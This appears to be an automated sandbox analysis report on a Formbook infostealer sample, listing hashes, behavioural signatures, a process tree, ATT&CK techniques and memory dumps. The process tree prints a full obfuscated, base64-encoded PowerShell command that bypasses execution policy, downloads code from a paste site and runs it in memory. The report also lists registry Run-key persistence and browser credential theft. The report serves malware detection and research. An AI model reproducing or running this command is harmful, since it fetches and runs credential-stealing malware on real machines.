formbook | 0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16

General

Target

DvnH2.exe
Size

847KB
MD5

bc23e4cf90c63d9a84eb905e6ec82f82
SHA1

b82df977fcc19b730ac2cdacec7d3b93617c57ed
SHA256

0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16
SHA512

01007caceb1e777b55d3118f7cb21117f2ca17b4caf211108b90de705c490c472df859da2802d015329b856d1be303bff6f73a624cb720682cea3f1cd0dcddd4

Score

10^/10

persistence spyware evasion trojan stealer formbook

Malware Config

Signatures

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exeMSBuild.exesystray.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	792	powershell.exe
Token: SeDebugPrivilege	1532	MSBuild.exe
Token: SeDebugPrivilege	1720	systray.exe
Token: SeShutdownPrivilege	1296	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

powershell.exepowershell.exeMSBuild.exesystray.exe

pid	process
1424	powershell.exe
1424	powershell.exe
792	powershell.exe
792	powershell.exe
1532	MSBuild.exe
1532	MSBuild.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 792 powershell.exe
6 792 powershell.exe
Drops file in Program Files directory 1 IoCs

Processes:

systray.exe

description ioc process

File opened for modification C:\Program Files (x86)\Dnnupd\gdiedg4.exe systray.exe

flow	pid	process
5	792	powershell.exe
6	792	powershell.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Dnnupd\gdiedg4.exe	systray.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

DvnH2.exepowershell.exepowershell.exeExplorer.EXEsystray.exe

description	pid	process	target process
PID 316 wrote to memory of 1424	316	DvnH2.exe	powershell.exe
PID 316 wrote to memory of 1424	316	DvnH2.exe	powershell.exe
PID 316 wrote to memory of 1424	316	DvnH2.exe	powershell.exe
PID 316 wrote to memory of 1424	316	DvnH2.exe	powershell.exe
PID 1424 wrote to memory of 792	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 792	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 792	1424	powershell.exe	powershell.exe
PID 1424 wrote to memory of 792	1424	powershell.exe	powershell.exe
PID 792 wrote to memory of 1532	792	powershell.exe	MSBuild.exe
PID 792 wrote to memory of 1532	792	powershell.exe	MSBuild.exe
PID 792 wrote to memory of 1532	792	powershell.exe	MSBuild.exe
PID 792 wrote to memory of 1532	792	powershell.exe	MSBuild.exe
PID 792 wrote to memory of 1532	792	powershell.exe	MSBuild.exe
PID 792 wrote to memory of 1532	792	powershell.exe	MSBuild.exe
PID 792 wrote to memory of 1532	792	powershell.exe	MSBuild.exe
PID 1296 wrote to memory of 1720	1296	Explorer.EXE	systray.exe
PID 1296 wrote to memory of 1720	1296	Explorer.EXE	systray.exe
PID 1296 wrote to memory of 1720	1296	Explorer.EXE	systray.exe
PID 1296 wrote to memory of 1720	1296	Explorer.EXE	systray.exe
PID 1720 wrote to memory of 1852	1720	systray.exe	cmd.exe
PID 1720 wrote to memory of 1852	1720	systray.exe	cmd.exe
PID 1720 wrote to memory of 1852	1720	systray.exe	cmd.exe
PID 1720 wrote to memory of 1852	1720	systray.exe	cmd.exe
PID 1720 wrote to memory of 1012	1720	systray.exe	Firefox.exe
PID 1720 wrote to memory of 1012	1720	systray.exe	Firefox.exe
PID 1720 wrote to memory of 1012	1720	systray.exe	Firefox.exe
PID 1720 wrote to memory of 1012	1720	systray.exe	Firefox.exe
PID 1720 wrote to memory of 1012	1720	systray.exe	Firefox.exe

Adds Run entry to policy start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

systray.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	systray.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\LPXXV = "C:\\Program Files (x86)\\Dnnupd\\gdiedg4.exe"	systray.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

systray.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	systray.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exeMSBuild.exesystray.exe

description	pid	process	target process
PID 792 set thread context of 1532	792	powershell.exe	MSBuild.exe
PID 1532 set thread context of 1296	1532	MSBuild.exe	Explorer.EXE
PID 1720 set thread context of 1296	1720	systray.exe	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

MSBuild.exesystray.exe

pid process

1532 MSBuild.exe
1532 MSBuild.exe
1532 MSBuild.exe
1720 systray.exe
1720 systray.exe
1720 systray.exe
1720 systray.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1296 Explorer.EXE
1296 Explorer.EXE
1296 Explorer.EXE
1296 Explorer.EXE
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

systray.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer systray.exe
Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

Explorer.EXE

pid process

1296 Explorer.EXE
1296 Explorer.EXE
1296 Explorer.EXE
1296 Explorer.EXE
1296 Explorer.EXE

pid	process
1532	MSBuild.exe
1532	MSBuild.exe
1532	MSBuild.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe
1720	systray.exe

pid	process
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	systray.exe

pid	process
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Explorer.EXE

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Explorer.EXE

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
PID:1296

C:\Users\Admin\AppData\Local\Temp\DvnH2.exe
"C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:1424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops file in System32 directory
PID:792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1532

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Adds Run entry to policy start application
- Modifies Internet Explorer settings
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- System policy modification
PID:1720

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:1852

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:1012

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\057903T3\057logim.jpeg

Download Submit
C:\Users\Admin\AppData\Roaming\057903T3\057logrf.ini

Download Submit
C:\Users\Admin\AppData\Roaming\057903T3\057logri.ini

Download Submit
C:\Users\Admin\AppData\Roaming\057903T3\057logrv.ini

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/792-3-0x0000000000000000-mapping.dmp

Download
memory/1012-14-0x0000000000000000-mapping.dmp

Download
memory/1012-15-0x000000013F4B0000-0x000000013F543000-memory.dmp

Filesize
588KB

Download
memory/1424-0-0x0000000000000000-mapping.dmp

Download
memory/1532-8-0x000000000041E200-mapping.dmp

Download
memory/1532-7-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/1720-13-0x0000000003150000-0x000000000320F000-memory.dmp

Filesize
764KB

Download
memory/1720-12-0x0000000002F20000-0x000000000301C000-memory.dmp

Filesize
1008KB

Download
memory/1720-10-0x0000000000E30000-0x0000000000E35000-memory.dmp

Filesize
20KB

Download
memory/1720-9-0x0000000000000000-mapping.dmp

Download
memory/1852-11-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads